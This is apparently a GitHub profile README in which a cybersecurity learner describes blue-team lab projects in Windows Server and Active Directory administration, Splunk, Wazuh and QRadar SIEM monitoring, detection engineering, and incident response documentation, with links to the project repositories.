Windows & SOC Operations Focused | Splunk, Wazuh, QRadar | Detection Engineering | Incident Response | Active Directory & Windows Infrastructure

I build hands-on cybersecurity and enterprise infrastructure labs focused on:

• SIEM monitoring and detection engineering
• Windows enterprise administration
• Incident investigation and troubleshooting
• Active Directory and Group Policy operations
• Log analysis and operational validation
• Blue-team workflows using real telemetry

My projects are designed to simulate real-world enterprise operations using structured documentation, investigation workflows, and validated lab-generated evidence.

I am a cybersecurity and Windows infrastructure learner focused on developing practical blue-team and operational administration skills through hands-on lab environments.

My work combines:

• SIEM monitoring and alert analysis
• Detection engineering
• Windows Server administration
• Active Directory operations
• Group Policy troubleshooting
• Incident response documentation
• DNS and DHCP troubleshooting
• PowerShell automation
• Enterprise operational workflows

I focus on learning by building realistic environments, generating real telemetry, validating detections, and documenting investigations using enterprise-style operational standards.

Production-style Windows Server administration and incident response lab environment.

• Built a Windows Server 2022 enterprise lab environment
• Configured:
  • Active Directory
  • DNS
  • DHCP
  • Group Policy
  • SMB file services
  • NTFS permissions
• Implemented department-based access control using security groups
• Performed:
  • Client-side troubleshooting
  • Group Policy validation
  • DNS troubleshooting
  • File share investigations
  • Standard-user testing
• Developed enterprise-style incident response documentation including:
  • Issue reports
  • Diagnosis
  • Root cause analysis
  • Remediation
  • Prevention guidance
  • Lessons learned
• Created PowerShell operational workflows and validation procedures
• Captured evidence using:
  • Event Viewer
  • PowerShell transcripts
  • Administrative consoles
  • Client validation screenshots

• Windows Server 2022
• Active Directory
• Group Policy
• DNS / DHCP
• PowerShell
• SMB / NTFS Permissions
• Event Viewer
• RSAT
• Windows 10/11
• Ubuntu Server

🔗 https://github.com/Niraj-Bathani/enterprise-system-admin-ops

Enterprise-style SIEM monitoring and investigation environment using Splunk Enterprise.

• Built a multi-host SIEM environment using Splunk Enterprise
• Ingested Windows and Linux telemetry
• Developed detections for:
  • PowerShell abuse
  • Authentication failures
  • Persistence techniques
  • LOLBins (certutil)
• Investigated simulated attack activity using SPL queries and event evidence
• Practiced SOC investigation workflows and event correlation

• Splunk Enterprise
• Windows Event Logs
• Linux logs
• Sysmon
• PowerShell
• VMware

🔗 https://github.com/Niraj-Bathani/splunk-siem-soc-lab

Detection engineering and alert validation environment using Wazuh SIEM.

• Implemented Wazuh with Windows and Linux agents
• Generated alerts using rule-based detections
• Simulated attack scenarios and validated alert generation
• Practiced SOC alert investigation and triage
• Documented detection workflows and investigation evidence

• Wazuh
• Linux
• Windows
• Sysmon
• Event Logs

🔗 https://github.com/Niraj-Bathani/wazuh-soc-detection-lab

SOC-style alert investigation and offense analysis using IBM QRadar.

• Investigated QRadar offenses and authentication alerts
• Analyzed brute-force login activity
• Practiced:
  • Alert triage
  • Event correlation
  • Investigation workflows
  • Offense analysis
• Documented findings and remediation workflows

• IBM QRadar
• Windows logs
• Linux logs
• Authentication events

🔗 https://github.com/Niraj-Bathani/qradar-offense-analysis

• SIEM Monitoring
• Detection Engineering
• Alert Triage
• Event Correlation
• Incident Investigation
• MITRE ATT&CK Mapping
• SPL Query Development

• Active Directory
• Group Policy
• DNS
• DHCP
• Windows Server Administration
• NTFS & SMB Permissions
• RSAT Administration

• Windows Event Log Analysis
• PowerShell Investigation
• Authentication Analysis
• Persistence Detection
• Reconnaissance Detection
• Operational Troubleshooting

• PowerShell
• Administrative Validation
• System Health Checks
• Operational Documentation
• Troubleshooting Runbooks

• Splunk Enterprise
• Wazuh
• IBM QRadar

• Windows Server 2022
• Active Directory
• Group Policy
• DNS / DHCP
• Event Viewer
• RSAT

• Sysmon
• Suricata (basic)
• Windows Security Logs
• Linux Authentication Logs

• Windows 10/11
• Ubuntu Server
• Kali Linux

• VMware
• Host-only Networking
• NAT Networking

I am currently focused on improving:

• Detection engineering workflows
• Splunk SPL query development
• Windows event analysis
• SOC investigation methodology
• Active Directory troubleshooting
• Incident response documentation
• Sysmon-based detections
• Operational validation workflows

• Expanding detection coverage with new attack scenarios
• Building SOC investigation playbooks
• Creating structured detection engineering labs
• Improving alert correlation workflows
• Developing PowerShell investigation tooling
• Exploring advanced Windows logging and Sysmon detections

My goal is to become a:

• SOC Analyst
• SIEM Engineer
• Detection Engineer
• Blue-Team Operations Analyst

by building practical, investigation-driven projects that reflect real-world enterprise security operations and Windows infrastructure administration.

• GitHub: https://github.com/Niraj-Bathani